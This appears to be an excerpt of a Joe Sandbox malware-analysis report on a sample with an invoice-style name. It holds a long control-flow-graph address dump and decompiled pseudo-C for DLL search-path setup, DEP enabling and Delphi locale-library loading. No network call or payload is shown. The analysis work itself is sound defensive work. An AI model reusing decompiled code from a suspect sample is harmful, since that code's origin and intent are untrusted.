8390->8391 8391->8381 8393 4049d4 8392->8393 8394 404a35 8392->8394 8398 404a27 8393->8398 8399 404a03 8393->8399 8395 4046c4 12 API calls 8394->8395 8397 4048a0 8395->8397 8397->8385 8397->8386 8403 404774 8398->8403 8400 402e38 12 API calls 8399->8400 8401 404a0b 8400->8401 8401->8397 8402 4046c4 12 API calls 8401->8402 8402->8397 8404 4047b6 8403->8404 8405 404778 8403->8405 8404->8394 8405->8404 8406 402e04 12 API calls 8405->8406 8407 404788 8406->8407 8407->8394 8412 405051 8408->8412 8420 404c98 8408->8420 8409 404ce8 8409->8335 8410 404c98 13 API calls 8410->8420 8411 404ca8 8414 4054b4 12 API calls 8411->8414 8417 404cb8 8411->8417 8412->8335 8412->8412 8413 405082 8418 4050a6 8413->8418 8419 404830 13 API calls 8413->8419 8414->8417 8415 402e20 12 API calls 8415->8409 8416 4054b4 12 API calls 8431 4050da 8416->8431 8417->8409 8417->8415 8421 404830 13 API calls 8418->8421 8423 4050c4 8418->8423 8419->8418 8420->8408 8420->8410 8420->8411 8420->8412 8420->8413 8420->8417 8422 404faa 8420->8422 8421->8423 8424 405021 8422->8424 8426 404fb5 8422->8426 8423->8412 8423->8416 8425 405031 8424->8425 8427 404830 13 API calls 8424->8427 8425->8412 8429 404f00 13 API calls 8425->8429 8428 404830 13 API calls 8426->8428 8430 404fc1 8426->8430 8427->8425 8428->8430 8436 404ffd 8429->8436 8433 404830 13 API calls 8430->8433 8437 404fe1 8430->8437 8434 405112 8431->8434 8435 4046e8 12 API calls 8431->8435 8432 404f00 13 API calls 8432->8436 8433->8437 8438 404c98 13 API calls 8434->8438 8435->8434 8440 40501c 8436->8440 8441 4046c4 12 API calls 8436->8441 8437->8412 8437->8432 8439 405123 8438->8439 8439->8335 8440->8335 8441->8440 8443 404d28 LoadLibraryW 8442->8443 8443->8374 8445 4069bd 8444->8445 8445->8220 8447 404d24 8446->8447 8448 406a04 LoadLibraryW 8447->8448 8449 406a1a 8448->8449 8449->8229 8455 40b7bc 8450->8455 8452 40b8be 8453 40b7bc 13 API calls 8452->8453 8454 40b8d7 8452->8454 8453->8452 8454->8079 8456 40b7e7 8455->8456 8457 404dd4 12 API calls 8456->8457 8458 40b7f4 8457->8458 8463 4054ac 8458->8463 8460 40b7fc 8461 404c98 13 API calls 8460->8461 8462 40b814 8461->8462 8462->8452 8465 405458 8463->8465 8464 4054a5 8464->8460 8465->8464 8467 40546b 8465->8467 8471 404818 8465->8471 8467->8464 8468 4054b4 12 API calls 8467->8468 8469 40547f 8468->8469 8469->8464 8470 402e20 12 API calls 8469->8470 8470->8464 8472 404e6c 13 API calls 8471->8472 8473 40481f 8472->8473 8473->8467 8476 404cf0 8474->8476 8475 404d20 8475->8090 8476->8475 8477 402e20 12 API calls 8476->8477 8477->8475 8479 404d24 8478->8479 8480 40c31c CreateFileW 8479->8480 8480->8095 8483 404964 8481->8483 8482 4049b3 8482->8146 8483->8482 8484 404774 12 API calls 8483->8484 8485 40498f 8484->8485 8485->8482 8486 402e20 12 API calls 8485->8486 8486->8482 8488 40471c 8487->8488 8491 404742 8487->8491 8490 404774 12 API calls 8488->8490 8488->8491 8489 404770 8489->8146 8490->8491 8491->8489 8492 402e20 12 API calls 8491->8492 8492->8489 8494 40cb4f 8493->8494 8497 40cb44 8493->8497 8501 40cad8 8494->8501 8497->8140 8498 409824 13 API calls 8499 40cb6f 8498->8499 8500 403f88 12 API calls 8499->8500 8500->8497 8502 40caec 8501->8502 8503 40cb2a 8501->8503 8502->8503 8505 40ca08 8502->8505 8503->8497 8503->8498 8506 40ca13 8505->8506 8507 40ca29 8505->8507 8508 409824 13 API calls 8506->8508 8509 40c1f8 53 API calls 8507->8509 8510 40ca24 8508->8510 8511 40ca38 8509->8511 8512 403f88 12 API calls 8510->8512 8513 40c1f8 53 API calls 8511->8513 8512->8507 8514 40ca59 8513->8514 8515 40c738 InterlockedExchange 8514->8515 8516 40ca6e 8515->8516 8517 40ca89 8516->8517 8518 409824 13 API calls 8516->8518 8517->8502 8519 40ca84 8518->8519 8520 403f88 12 API calls 8519->8520 8520->8517 8522 40c6f6 8521->8522 8524 40c707 8521->8524 8523 40c6fb InterlockedExchange 8522->8523 8523->8524 8524->8053 8590 40cee8 8591 40cefa 8590->8591 8592 40cf01 8590->8592 8601 40ce24 8591->8601 8595 40cf2b 8592->8595 8598 40cf29 8592->8598 8600 40cf35 8592->8600 8594 40cf62 8614 40cc3c 8595->8614 8596 40cc3c 52 API calls 8596->8594 8619 40cd3c 8598->8619 8600->8594 8600->8596 8602 40ce39 8601->8602 8603 40cc3c 52 API calls 8602->8603 8604 40ce48 8602->8604 8603->8604 8605 40cc3c 52 API calls 8604->8605 8606 40ce82 8604->8606 8605->8606 8607 40cc3c 52 API calls 8606->8607 8608 40ce96 8606->8608 8607->8608 8609 40cec7 8608->8609 8624 40cdcc 8608->8624 8609->8592 8612 40cec2 8627 409818 8612->8627 8630 409860 8614->8630 8616 40cc5e 8617 403f88 12 API calls 8616->8617 8618 40cc63 8617->8618 8618->8600 8620 4082d4 52 API calls 8619->8620 8621 40cd67 8620->8621 8636 40ccdc 8621->8636 8623 40cd6f 8623->8600 8625 40cded VirtualAlloc 8624->8625 8626 40cddb VirtualFree 8624->8626 8625->8609 8625->8612 8626->8625 8628 403f88 12 API calls 8627->8628 8629 409822 8628->8629 8629->8609 8631 40986c 8630->8631 8632 4082d4 52 API calls 8631->8632 8633 409899 8632->8633 8634 404c98 13 API calls 8633->8634 8635 4098a4 8634->8635 8635->8616 8637 409860 52 API calls 8636->8637 8638 40ccfe 8637->8638 8639 403f88 12 API calls 8638->8639 8640 40cd03 8639->8640 8640->8623 8641 40c328 SetFilePointer 8642 40c35b 8641->8642 8643 40c34b GetLastError 8641->8643 8643->8642 8644 40c354 8643->8644 8645 40c1e4 54 API calls 8644->8645 8645->8642 8646 411a14 8647 411a70 8646->8647 8650 411a29 8646->8650 8678 4030bc QueryPerformanceCounter 8647->8678 8649 411a75 8681 40e414 8649->8681 8709 40df20 8650->8709 8653 411a7d 8655 404c98 13 API calls 8653->8655 8654 411a4c 8656 411a54 MessageBoxW 8654->8656 8657 411a8a 8655->8657 8656->8647 8658 411a61 8656->8658 8696 40b5d4 8657->8696 8712 409810 8658->8712 8663 411aa7 8664 40b2e0 13 API calls 8663->8664 8665 411ab8 8664->8665 8666 405058 13 API calls 8665->8666 8667 411ac6 8666->8667 8668 404c98 13 API calls 8667->8668 8669 411ad6 8668->8669 8670 40c238 55 API calls 8669->8670 8671 411b15 8670->8671 8672 402e04 12 API calls 8671->8672 8673 411b35 8672->8673 8674 40c854 14 API calls 8673->8674 8675 411b77 8674->8675 8676 40cb34 54 API calls 8675->8676 8677 411b9e 8676->8677 8679 4030d4 GetTickCount 8678->8679 8680 4030c9 8678->8680 8679->8649 8680->8649 8693 40e41c 8681->8693 8684 40e45b CreateDirectoryW 8685 40e4d7 8684->8685 8686 40e465 GetLastError 8684->8686 8687 404c98 13 API calls 8685->8687 8686->8693 8691 40e4e1 8687->8691 8688 40df20 13 API calls 8688->8693 8689 407ee8 13 API calls 8689->8693 8690 40bf84 13 API calls 8690->8693 8691->8653 8692 40def0 13 API calls 8692->8693 8693->8684 8693->8688 8693->8689 8693->8690 8693->8692 8694 409824 13 API calls 8693->8694 8695 403f88 12 API calls 8693->8695 8716 40b9fc 8693->8716 8737 40e2f8 8693->8737 8694->8693 8695->8693 8697 40b5e4 8696->8697 8698 40525c 13 API calls 8697->8698 8699 40b5f6 8698->8699 8700 40b348 8699->8700 8701 40b372 8700->8701 8702 40b378 8701->8702 8703 40b386 8701->8703 8704 405058 13 API calls 8702->8704 8705 40525c 13 API calls 8703->8705 8708 40b384 8704->8708 8706 40b399 8705->8706 8707 405058 13 API calls 8706->8707 8707->8708 8708->8663 8710 40def0 13 API calls 8709->8710 8711 40df3c 8710->8711 8711->8654 8713 4097f0 8712->8713 8714 409806 8713->8714 8853 4098e0 8713->8853 8714->8714 8753 40b710 8716->8753 8719 40ba2c 8720 40b710 14 API calls 8719->8720 8723 40ba79 8719->8723 8722 40ba3c 8720->8722 8724 40ba48 8722->8724 8725 40b6ec 14 API calls 8722->8725 8761 40b524 8723->8761 8724->8723 8727 40b710 14 API calls 8724->8727 8735 40ba6e 8724->8735 8725->8724 8730 40ba62 8727->8730 8733 40b6ec 14 API calls 8730->8733 8730->8735 8731 40b2e0 13 API calls 8732 40ba8e 8731->8732 8734 404c98 13 API calls 8732->8734 8733->8735 8736 40ba98 8734->8736 8735->8723 8773 40b9a4 GetWindowsDirectoryW 8735->8773 8736->8693 8738 40e31c 8737->8738 8739 40b2e0 13 API calls 8738->8739 8740 40e335 8739->8740 8741 404cec 12 API calls 8740->8741 8748 40e340 8741->8748 8743 40b62c 13 API calls 8743->8748 8745 40df20 13 API calls 8745->8748 8746 409824 13 API calls 8746->8748 8748->8743 8748->8745 8748->8746 8749 403f88 12 API calls 8748->8749 8750 40e3bc 8748->8750 8800 40e280 8748->8800 8806 40513c 8748->8806 8821 40e1e0 8748->8821 8749->8748 8751 404c98 13 API calls 8750->8751 8752 40e3c7 8751->8752 8752->8693 8754 404f00 13 API calls 8753->8754 8755 40b724 8754->8755 8756 40b745 GetEnvironmentVariableW 8755->8756 8760 40b75a 8755->8760 8775 40bb10 8755->8775 8756->8755 8757 40b751 8756->8757 8759 404c98 13 API calls 8757->8759 8759->8760 8760->8719 8770 40b6ec 8760->8770 8762 40b52d 8761->8762 8763 40b554 GetFullPathNameW 8762->8763 8764 40b560 8763->8764 8765 40b577 8763->8765 8764->8765 8766 40b568 8764->8766 8767 404c98 13 API calls 8765->8767 8768 404dd4 12 API calls 8766->8768 8769 40b575 8767->8769 8768->8769 8769->8731 8779 40b698 8770->8779 8772 40b6f1 8772->8719 8774 40b9c5 8773->8774 8774->8723 8776 40bb1e 8775->8776 8777 404f00 13 API calls 8776->8777 8778 40bb2d 8777->8778 8778->8755 8784 40b62c 8779->8784 8781 40b6b8 8782 40b6c0 GetFileAttributesW 8781->8782 8783 40b6d5 8782->8783 8783->8772 8785 40b63d 8784->8785 8786 40b683 8785->8786 8787 40b678 8785->8787 8791 40525c 8786->8791 8789 404c98 13 API calls 8787->8789 8790 40b681 8789->8790 8790->8781 8792 405272 8791->8792 8793 404820 13 API calls 8792->8793 8794 40529d 8792->8794 8793->8794 8795 4052e5 8794->8795 8796 4052f8 8794->8796 8797 404dd4 12 API calls 8795->8797 8798 404dc4 13 API calls 8796->8798 8799 4052f6 8797->8799 8798->8799 8799->8790 8801 404c98 13 API calls 8800->8801 8802 40e2a3 8801->8802 8805 40e2d2 8802->8805 8830 404e04 8802->8830 8833 40532c 8802->8833 8805->8748 8807 405154 8806->8807 8817 405171 8806->8817 8812 404830 13 API calls 8807->8812 8807->8817 8808 4051da 8809 4051f7 8808->8809 8810 4051de 8808->8810 8811 4054b4 12 API calls 8809->8811 8813 404f00 13 API calls 8810->8813 8816 4051eb 8811->8816 8812->8817 8813->8816 8814 405240 8814->8814 8815 404830 13 API calls 8815->8817 8818 4046e8 12 API calls 8816->8818 8817->8808 8817->8814 8817->8815 8819 40522c 8818->8819 8819->8814 8820 404c98 13 API calls 8819->8820 8820->8814 8841 40e11c 8821->8841 8823 40e1f6 8824 40e1fa 8823->8824 8847 40b700 8823->8847 8824->8748 8827 40e22d 8850 40e158 8827->8850 8831 404dd4 12 API calls 8830->8831 8832 404e11 8831->8832 8832->8802 8834 405345 8833->8834 8835 405370 8834->8835 8836 404820 13 API calls 8834->8836 8837 4053e4 8835->8837 8838 40539d 8835->8838 8839 404820 13 API calls 8835->8839 8836->8835 8837->8802 8840 404f00 13 API calls 8838->8840 8839->8838 8840->8837 8842 40e126 8841->8842 8843 40e12a 8841->8843 8842->8823 8844 40e133 Wow64DisableWow64FsRedirection 8843->8844 8845 40e14c SetLastError 8843->8845 8846 40e147 8844->8846 8845->8846 8846->8823 8848 40b698 14 API calls 8847->8848 8849 40b70a GetLastError 8848->8849 8849->8827 8851 40e167 8850->8851 8852 40e15d Wow64RevertWow64FsRedirection 8850->8852 8851->8748 8852->8851 8855 4098e7 8853->8855 8854 4063e4 44 API calls 8856 4098ff 8854->8856 8855->8854 8856->8714 7566 401e74 7567 401e84 7566->7567 7568 401f0c 7566->7568 7570 401ec8 7567->7570 7571 401e91 7567->7571 7569 401f15 7568->7569 7573 4017ac 7568->7573 7577 40203c 7569->7577 7582 401f2d 7569->7582 7576 4018f8 10 API calls 7570->7576 7574 401e9c 7571->7574 7575 401ea0 7571->7575 7572 402187 7573->7572 7578 4018af 7573->7578 7584 4017ce VirtualQuery 7573->7584 7579 4018f8 10 API calls 7575->7579 7580 401edf 7576->7580 7596 402078 Sleep 7577->7596 7598 4020b9 7577->7598 7601 40212d 7577->7601 7602 4020a0 7577->7602 7586 4018b5 7578->7586 7587 4018bf 7578->7587 7581 401ea9 7579->7581 7585 401f05 7580->7585 7605 401c7c 10 API calls 7580->7605 7588 401ec1 7581->7588 7610 401c7c 10 API calls 7581->7610 7592 401f50 7582->7592 7593 402014 7582->7593 7613 401f34 7582->7613 7583 4018f8 10 API calls 7590 402150 7583->7590 7595 401877 7584->7595 7600 401807 7584->7600 7589 4018f8 10 API calls 7587->7589 7604 4018c6 7589->7604 7590->7598 7614 401c7c 10 API calls 7590->7614 7599 401f90 Sleep 7592->7599 7592->7613 7594 4018f8 10 API calls 7593->7594 7607 40201d 7594->7607 7621 4018f8 7595->7621 7596->7602 7603 402092 Sleep 7596->7603 7611 401fa8 Sleep 7599->7611 7599->7613 7600->7595 7608 401834 VirtualAlloc 7600->7608 7609 401832 7600->7609 7601->7583 7602->7598 7602->7601 7603->7577 7604->7586 7618 401c7c 10 API calls 7604->7618 7605->7585 7606 402035 7607->7606 7617 401c7c 10 API calls 7607->7617 7608->7595 7612 40184a VirtualAlloc 7608->7612 7609->7608 7610->7588 7611->7592 7612->7595 7620 401860 7612->7620 7616 402174 7614->7616 7615 40187e 7615->7586 7645 401c7c 7615->7645 7617->7606 7618->7586 7620->7586 7622 401b58 7621->7622 7629 401910 7621->7629 7623 401c70 7622->7623 7631 401b1c 7622->7631 7625 401c79 7623->7625 7626 4016a4 VirtualAlloc 7623->7626 7624 401931 7624->7615 7625->7615 7627 4016df 7626->7627 7628 4016cf 7626->7628 7627->7615 7665 40165c 7628->7665 7632 401922 7629->7632 7636 4019ad Sleep 7629->7636 7630 401b76 7640 4015e4 VirtualAlloc 7630->7640 7643 401b94 7630->7643 7631->7630 7635 401b36 Sleep 7631->7635 7632->7624 7633 401a10 7632->7633 7638 4019f1 Sleep 7632->7638 7644 401a1c 7633->7644 7671 4015e4 7633->7671 7635->7630 7637 401b4c Sleep 7635->7637 7636->7632 7639 4019c3 Sleep 7636->7639 7637->7631 7638->7633 7642 401a07 Sleep 7638->7642 7639->7629 7640->7643 7642->7632 7643->7615 7644->7615 7646 401d74 7645->7646 7647 401c91 7645->7647 7648 401708 7646->7648 7649 401c97 7646->7649 7647->7649 7654 401d0e Sleep 7647->7654 7651 401e6e 7648->7651 7653 40165c 2 API calls 7648->7653 7650 401d89 7649->7650 7652 401ca0 7649->7652 7657 401d52 Sleep 7649->7657 7661 401e08 VirtualFree 7650->7661 7662 401dac 7650->7662 7651->7620 7652->7620 7655 401719 7653->7655 7654->7649 7656 401d28 Sleep 7654->7656 7658 40172f VirtualFree 7655->7658 7664 401749 7655->7664 7656->7647 7657->7650 7659 401d68 Sleep 7657->7659 7663 401740 7658->7663 7659->7649 7660 401752 VirtualQuery VirtualFree 7660->7663 7660->7664 7661->7620 7662->7620 7663->7620 7664->7660 7664->7663 7666 4016a2 7665->7666 7667 401665 7665->7667 7666->7627 7667->7666 7668 401670 Sleep 7667->7668 7669 401685 7668->7669 7669->7666 7670 401689 Sleep 7669->7670 7670->7667 7675 401578 7671->7675 7673 4015ec VirtualAlloc 7674 401603 7673->7674 7674->7644 7676 401518 7675->7676 7676->7673

    Executed Functions

    Control-flow Graph

    C-Code - Quality: 53%
    			E004110C4(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				long _t37;
    				_Unknown_base(*)()* _t40;
    				_Unknown_base(*)()* _t41;
    				_Unknown_base(*)()* _t44;
    				signed int _t49;
    				void* _t105;
    				void* _t106;
    				intOrPtr _t122;
    				signed int _t125;
    				signed int _t126;
    				signed int _t127;
    				signed int _t128;
    				signed int _t129;
    				signed int _t130;
    				signed int _t131;
    				signed int _t132;
    				signed int _t133;
    				signed int _t134;
    				signed int _t135;
    				signed int _t136;
    				signed int _t137;
    				struct HINSTANCE__* _t140;
    				intOrPtr* _t142;
    				intOrPtr _t144;
    				intOrPtr _t145;
    
    				_t144 = _t145;
    				_t106 = 6;
    				do {
    					_push(0);
    					_push(0);
    					_t106 = _t106 - 1;
    				} while (_t106 != 0);
    				_push(_t106);
    				_push(_t144);
    				_push(0x41131e);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t145;
    				 *0x415b58 =  *0x415b58 - 1;
    				if( *0x415b58 >= 0) {
    					L19:
    					_pop(_t122);
    					 *[fs:eax] = _t122;
    					_push(E00411325);
    					return L00404C90( &_v56, 0xd);
    				}
    				_t140 = GetModuleHandleW(L"kernel32.dll");
    				_t37 = GetVersion();
    				_t105 = 0;
    				if(_t37 != 0x600) {
    					_t142 = GetProcAddress(_t140, "SetDefaultDllDirectories");
    					if(_t142 != 0) {
    						 *_t142(0x800);
    						asm("sbb ebx, ebx");
    						_t105 = 1;
    					}
    				}
    				if(_t105 == 0) {
    					_t44 = GetProcAddress(_t140, "SetDllDirectoryW");
    					if(_t44 != 0) {
    						 *_t44(0x411378);
    					}
    					E0040699C( &_v8);
    					E00404C98(0x415b5c, _v8);
    					if( *0x415b5c != 0) {
    						_t49 =  *0x415b5c; // 0x0
    						if(_t49 != 0) {
    							_t49 =  *(_t49 - 4);
    						}
    						_t125 =  *0x415b5c; // 0x0
    						if( *((short*)(_t125 + _t49 * 2 - 2)) != 0x5c) {
    							E00404F98(0x415b5c, 0x411388);
    						}
    						_t126 =  *0x415b5c; // 0x0
    						E00405058( &_v12, L"uxtheme.dll", _t126);
    						E004069C8(_v12, _t105);
    						_t127 =  *0x415b5c; // 0x0
    						E00405058( &_v16, L"userenv.dll", _t127);
    						E004069C8(_v16, _t105);
    						_t128 =  *0x415b5c; // 0x0
    						E00405058( &_v20, L"setupapi.dll", _t128);
    						E004069C8(_v20, _t105);
    						_t129 =  *0x415b5c; // 0x0
    						E00405058( &_v24, L"apphelp.dll", _t129);
    						E004069C8(_v24, _t105);
    						_t130 =  *0x415b5c; // 0x0
    						E00405058( &_v28, L"propsys.dll", _t130);
    						E004069C8(_v28, _t105);
    						_t131 =  *0x415b5c; // 0x0
    						E00405058( &_v32, L"dwmapi.dll", _t131);
    						E004069C8(_v32, _t105);
    						_t132 =  *0x415b5c; // 0x0
    						E00405058( &_v36, L"cryptbase.dll", _t132);
    						E004069C8(_v36, _t105);
    						_t133 =  *0x415b5c; // 0x0
    						E00405058( &_v40, L"oleacc.dll", _t133);
    						E004069C8(_v40, _t105);
    						_t134 =  *0x415b5c; // 0x0
    						E00405058( &_v44, L"version.dll", _t134);
    						E004069C8(_v44, _t105);
    						_t135 =  *0x415b5c; // 0x0
    						E00405058( &_v48, L"profapi.dll", _t135);
    						E004069C8(_v48, _t105);
    						_t136 =  *0x415b5c; // 0x0
    						E00405058( &_v52, L"comres.dll", _t136);
    						E004069C8(_v52, _t105);
    						_t137 =  *0x415b5c; // 0x0
    						E00405058( &_v56, L"clbcatq.dll", _t137);
    						E004069C8(_v56, _t105);
    					}
    				}
    				_t40 = GetProcAddress(_t140, "SetSearchPathMode");
    				if(_t40 != 0) {
    					 *_t40(0x8001);
    				}
    				_t41 = GetProcAddress(_t140, "SetProcessDEPPolicy");
    				if(_t41 != 0) {
    					 *_t41(1); // executed
    				}
    				goto L19;
    			}









































    0x004110c5
    0x004110c7
    0x004110cc
    0x004110cc
    0x004110ce
    0x004110d0
    0x004110d0
    0x004110d3
    0x004110d9
    0x004110da
    0x004110df
    0x004110e2
    0x004110e5
    0x004110ec
    0x00411303
    0x00411305
    0x00411308
    0x0041130b
    0x0041131d
    0x0041131d
    0x004110fc
    0x004110fe
    0x00411105
    0x0041110b
    0x00411118
    0x0041111c
    0x00411123
    0x00411128
    0x0041112a
    0x0041112a
    0x0041111c
    0x0041112d
    0x00411139
    0x00411140
    0x00411147
    0x00411147
    0x0041114c
    0x00411159
    0x00411165
    0x0041116b
    0x00411172
    0x00411177
    0x00411177
    0x00411179
    0x00411185
    0x00411191
    0x00411191
    0x0041119e
    0x004111a4
    0x004111ac
    0x004111b9
    0x004111bf
    0x004111c7
    0x004111d4
    0x004111da
    0x004111e2
    0x004111ef
    0x004111f5
    0x004111fd
    0x0041120a
    0x00411210
    0x00411218
    0x00411225
    0x0041122b
    0x00411233
    0x00411240
    0x00411246
    0x0041124e
    0x0041125b
    0x00411261
    0x00411269
    0x00411276
    0x0041127c
    0x00411284
    0x00411291
    0x00411297
    0x0041129f
    0x004112ac
    0x004112b2
    0x004112ba
    0x004112c7
    0x004112cd
    0x004112d5
    0x004112d5
    0x00411165
    0x004112e0
    0x004112e7
    0x004112ee
    0x004112ee
    0x004112f6
    0x004112fd
    0x00411301
    0x00411301
    0x00000000

    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,0041131E,?,?,?,?,00000005,00000000,00000000), ref: 004110F7
    • GetVersion.KERNEL32(kernel32.dll,00000000,0041131E,?,?,?,?,00000005,00000000,00000000), ref: 004110FE
    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories,kernel32.dll,00000000,0041131E,?,?,?,?,00000005,00000000,00000000), ref: 00411113
    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW,kernel32.dll,00000000,0041131E,?,?,?,?,00000005,00000000,00000000), ref: 00411139
      • Part of subcall function 0040699C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069AF
      • Part of subcall function 004069C8: SetErrorMode.KERNEL32(00008000), ref: 004069D6
      • Part of subcall function 004069C8: LoadLibraryW.KERNEL32(00000000), ref: 00406A05
    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode,kernel32.dll,00000000,0041131E,?,?,?,?,00000005,00000000,00000000), ref: 004112E0
    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,0041131E,?,?,?,?,00000005,00000000,00000000), ref: 004112F6
    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,0041131E,?,?,?,?,00000005,00000000,00000000), ref: 00411301
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 76 405de8-405e2b GetModuleFileNameW RegOpenKeyExW 77 405e8b-405ece call 405bec RegQueryValueExW 76->77 78 405e2d-405e49 RegOpenKeyExW 76->78 84 405ed0-405eec RegQueryValueExW 77->84 85 405ef4-405ef9 77->85 78->77 79 405e4b-405e67 RegOpenKeyExW 78->79 79->77 81 405e69-405e85 RegOpenKeyExW 79->81 81->77 83 405f23-405f55 lstrcpynW GetThreadLocale GetLocaleInfoW 81->83 86 405f5b-405f60 83->86 87 406060-406067 83->87 84->85 88 405eee 84->88 89 405efb 85->89 90 405efe-405f1b RegCloseKey 85->90 92 405f62-405f67 86->92 93 405f6d-405f85 lstrlenW 86->93 88->85 89->90 92->87 92->93 94 405f8a-405f8e 93->94 95 405f9a-405fa2 94->95 96 405f90-405f98 94->96 95->87 97 405fa8-405fb0 95->97 96->95 98 405f87 96->98 99 405fe1-405fe3 97->99 100 405fb2-405fb8 97->100 98->94 99->87 101 405fe5-405fea 99->101 102 405fbd-405fdf lstrcpynW LoadLibraryExW 100->102 103 405fba 100->103 101->87 104 405fec-405ff8 101->104 102->99 103->102 105 405ffa 104->105 106 405ffd-406023 lstrcpynW LoadLibraryExW 104->106 105->106 106->87 107 406025-406037 106->107 108 406039 107->108 109 40603c-40605e lstrcpynW LoadLibraryExW 107->109 108->109 109->87
    C-Code - Quality: 84%
    			E00405DE8(WCHAR* __eax) {
    				WCHAR* _v8;
    				void* _v12;
    				short _v18;
    				short _v22;
    				short _v32;
    				int _v36;
    				short _v558;
    				long _t48;
    				signed int _t58;
    				long _t67;
    				long _t69;
    				long _t71;
    				WCHAR* _t82;
    				struct HINSTANCE__* _t89;
    				struct HINSTANCE__* _t96;
    				short* _t108;
    				WCHAR* _t109;
    				intOrPtr _t113;
    				signed int _t115;
    				signed int _t116;
    				signed int _t118;
    				signed int _t119;
    				signed int _t121;
    				signed int _t122;
    				struct HINSTANCE__* _t124;
    				void* _t127;
    				void* _t129;
    				intOrPtr _t130;
    				long _t137;
    
    				_t127 = _t129;
    				_t130 = _t129 + 0xfffffdd4;
    				_v8 = __eax;
    				GetModuleFileNameW(0,  &_v558, 0x105);
    				_v32 = 0;
    				_t48 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v12); // executed
    				if(_t48 == 0) {
    					L4:
    					_push(_t127);
    					_push(0x405f1c);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t130;
    					_v36 = 0xa;
    					E00405BEC( &_v558, 0x105);
    					if(RegQueryValueExW(_v12,  &_v558, 0, 0,  &_v32,  &_v36) != 0) {
    						_t137 = RegQueryValueExW(_v12, E00406110, 0, 0,  &_v32,  &_v36);
    						if(_t137 != 0) {
    							_v32 = 0;
    						}
    					}
    					_t58 = _v36 >> 1;
    					if(_t137 < 0) {
    						asm("adc eax, 0x0");
    					}
    					 *((short*)(_t127 + _t58 * 2 - 0x1c)) = 0;
    					_pop(_t113);
    					 *[fs:eax] = _t113;
    					_push(E00405F23);
    					return RegCloseKey(_v12);
    				} else {
    					_t67 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v12); // executed
    					if(_t67 == 0) {
    						goto L4;
    					} else {
    						_t69 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    						if(_t69 == 0) {
    							goto L4;
    						} else {
    							_t71 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
    							if(_t71 != 0) {
    								lstrcpynW( &_v558, _v8, 0x105);
    								GetLocaleInfoW(GetThreadLocale(), 3,  &_v22, 5); // executed
    								_t124 = 0;
    								if(_v558 != 0 && (_v22 != 0 || _v32 != 0)) {
    									_t108 = lstrlenW( &_v558) + _t80 +  &_v558;
    									L16:
    									if( *_t108 != 0x2e && _t108 !=  &_v558) {
    										_t108 = _t108 - 2;
    										goto L16;
    									}
    									_t82 =  &_v558;
    									if(_t108 != _t82) {
    										_t109 = _t108 + 2;
    										if(_v32 != 0) {
    											_t121 = _t109 - _t82;
    											_t122 = _t121 >> 1;
    											if(_t121 < 0) {
    												asm("adc edx, 0x0");
    											}
    											lstrcpynW(_t109,  &_v32, 0x105 - _t122);
    											_t124 = LoadLibraryExW( &_v558, 0, 2);
    										}
    										if(_t124 == 0 && _v22 != 0) {
    											_t115 = _t109 -  &_v558;
    											_t116 = _t115 >> 1;
    											if(_t115 < 0) {
    												asm("adc edx, 0x0");
    											}
    											lstrcpynW(_t109,  &_v22, 0x105 - _t116);
    											_t89 = LoadLibraryExW( &_v558, 0, 2); // executed
    											_t124 = _t89;
    											if(_t124 == 0) {
    												_v18 = 0;
    												_t118 = _t109 -  &_v558;
    												_t119 = _t118 >> 1;
    												if(_t118 < 0) {
    													asm("adc edx, 0x0");
    												}
    												lstrcpynW(_t109,  &_v22, 0x105 - _t119);
    												_t96 = LoadLibraryExW( &_v558, 0, 2); // executed
    												_t124 = _t96;
    											}
    										}
    									}
    								}
    								return _t124;
    							} else {
    								goto L4;
    							}
    						}
    					}
    				}
    			}
































    0x00405de9
    0x00405deb
    0x00405df3
    0x00405e04
    0x00405e09
    0x00405e24
    0x00405e2b
    0x00405e8b
    0x00405e8d
    0x00405e8e
    0x00405e93
    0x00405e96
    0x00405e99
    0x00405eab
    0x00405ece
    0x00405eea
    0x00405eec
    0x00405eee
    0x00405eee
    0x00405eec
    0x00405ef7
    0x00405ef9
    0x00405efb
    0x00405efb
    0x00405efe
    0x00405f07
    0x00405f0a
    0x00405f0d
    0x00405f1b
    0x00405e2d
    0x00405e42
    0x00405e49
    0x00000000
    0x00405e4b
    0x00405e60
    0x00405e67
    0x00000000
    0x00405e69
    0x00405e7e
    0x00405e85
    0x00405f33
    0x00405f46
    0x00405f4b
    0x00405f55
    0x00405f83
    0x00405f8a
    0x00405f8e
    0x00405f87
    0x00000000
    0x00405f87
    0x00405f9a
    0x00405fa2
    0x00405fa8
    0x00405fb0
    0x00405fb4
    0x00405fb6
    0x00405fb8
    0x00405fba
    0x00405fba
    0x00405fca
    0x00405fdf
    0x00405fdf
    0x00405fe3
    0x00405ff4
    0x00405ff6
    0x00405ff8
    0x00405ffa
    0x00405ffa
